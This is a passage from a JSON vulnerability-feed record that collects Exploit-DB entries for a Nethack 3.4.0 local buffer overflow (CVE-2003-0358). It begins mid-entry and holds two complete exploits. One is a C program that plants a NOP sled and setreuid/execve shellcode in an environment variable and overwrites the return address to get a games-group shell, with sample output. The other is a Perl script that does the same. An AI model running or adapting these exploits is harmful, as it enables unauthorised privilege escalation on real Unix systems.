execl(\"/usr/games/lib/nethackdir/nethack\",\"nethack\",\"-s\",p,0);\r\n perror(\"wtf\");\r\n}", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22233/"}, {"lastseen": "2016-02-02T18:16:56", "description": "Nethack 3 Local Buffer Overflow Vulnerability (2). CVE-2003-0358. Local exploit for linux platform", "published": "2003-02-10T00:00:00", "type": "exploitdb", "title": "Nethack 3 - Local Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0358"], "modified": "2003-02-10T00:00:00", "id": "EDB-ID:22234", "href": "https://www.exploit-db.com/exploits/22234/", "sourceData": "source: http://www.securityfocus.com/bid/6806/info\r\n \r\nBy passing an overly large string when invoking nethack, it is possible to corrupt memory.\r\n \r\nBy exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.\r\n \r\nslashem, jnethack and falconseye are also prone to this vulnerability.\r\n\r\n\r\n/* DSR-nethack.c by bob@dtors.net\r\n * Vulnerbility Found by tsao.\r\n *\r\n * Local BufferOverflow that leads\r\n * to elevated privileges [games].\r\n *\r\n * Basic PoC code...nothing special.\r\n *[bob@dtors bob]$ ./DSR-nethack\r\n *\r\n * DSR-nethack.c By bob.\r\n * Local Exploit for Nethack 3.4.0\r\n * DSR-[www.dtors.net]-DSR\r\n * \r\n * ret: 0xbffffd86\r\n *\r\n * Cannot find any current entries for \r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.\ufffd\ufffd\ufffd\r\n * Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]\r\n * Player types are: [-p role] [-r race]\r\n * sh-2.05b$ id -a\r\n * uid=12(games) gid=501(bob) groups=501(bob)\r\n * sh-2.05b$ \r\n *\r\n * www.dtors.net // www.b0f.net\r\n */\r\n#include <stdio.h>\r\nchar shellcode[]= /* shellcode by bob */\r\n \r\n\"\\x29\\xc4\\x31\\xc0\\x31\\xc9\\x31\\xdb\\xb3\\x0c\\x89\\xd9\\xb0\\x46\\xcd\\x80\" //minus\r\n\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\"\r\n\"\\xe3\\x8d\\x54\\x24\\x08\\x50\\x53\\x8d\\x0c\\x24\\xb0\\x0b\\xcd\\x80\";\r\nint main ()\r\n{\r\n unsigned long ret = 0xbffffd86; //Redhat 8.0 i386\r\n char buf[224]; \r\n char smeg[1024];\r\n char *ptr; \r\n int i=0; \r\nfprintf(stdout, \"\\n\\tDSR-nethack.c By bob.\\n\"); \r\nfprintf(stdout, \"Local Exploit for Nethack 3.4.0\\n\");\r\nfprintf(stdout, \"\\tDSR-[www.dtors.net]-DSR\\n\");\r\n \r\nmemset(buf, 0x41, sizeof(buf)); \r\n ptr = smeg; \r\n for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90; \r\n for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; \r\n smeg[1024 - 1] = '\\0'; //null byte\r\n memcpy(smeg,\"EGG=\",4); \r\n putenv(smeg);\r\n buf[220] = (ret & 0x000000ff); \r\n buf[221] = (ret & 0x0000ff00) >> 8;\r\n buf[222] = (ret & 0x00ff0000) >> 16;\r\n buf[223] = (ret & 0xff000000) >> 24;\r\n buf[224] = '\\0';\r\n \r\n fprintf(stdout,\"ret: 0x%08x\\n\",ret);\r\n \r\n execl(\"/usr/games/lib/nethackdir/nethack\", \"nethack\", \"-s\", buf, \r\nNULL); //weeoooweeeeooowooo\r\n return 0;\r\n}", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22234/"}, {"lastseen": "2016-02-02T18:17:05", "description": "Nethack 3 Local Buffer Overflow Vulnerability (3). CVE-2003-0358. Local exploit for linux platform", "published": "2003-02-10T00:00:00", "type": "exploitdb", "title": "Nethack 3 - Local Buffer Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0358"], "modified": "2003-02-10T00:00:00", "id": "EDB-ID:22235", "href": "https://www.exploit-db.com/exploits/22235/", "sourceData": "source: http://www.securityfocus.com/bid/6806/info\r\n \r\nBy passing an overly large string when invoking nethack, it is possible to corrupt memory.\r\n \r\nBy exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.\r\n \r\nslashem, jnethack and falconseye are also prone to this vulnerability.\r\n\r\n#!/usr/bin/perl -w\r\n#\r\n# tsao@efnet #!IC@efnet 2k3\r\n# thnx to aleph1 for execve shellcode\r\n# davidicke for setreuid() shellcode\r\n\r\n\r\n$sc .= \"\\x31\\xdb\\x31\\xc9\\xbb\\xff\\xff\\xff\\xff\\xb1\\x0c\\x31\\xc0\\xb0\\x46\\xcd\\x80\\x31\\xdb\";\r\n$sc .= \"\\x31\\xc9\\xb3\\x0c\\xb1\\x0c\\x31\\xc0\\xb0\\x46\\xcd\\x80\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\";\r\n$sc .= \"\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\\x56\\x34\\x12\";\r\n$sc .= \"\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\\xff\\xff\\xff\\x2f\\x62\";\r\n$sc .= \"\\x69\\x6e\\x2f\\x73\\x68\\x01\";\r\n\r\nfor ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {\r\n $buf .= \"\\x90\";\r\n}\r\n\r\n$buf .= $sc;\r\n$buf .= \"\\xd2\\xf8\\xff\\xbf\";\r\n\r\nexec(\"/usr/games/lib/nethackdir/nethack -s '$buf'\");", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22235/"}]}
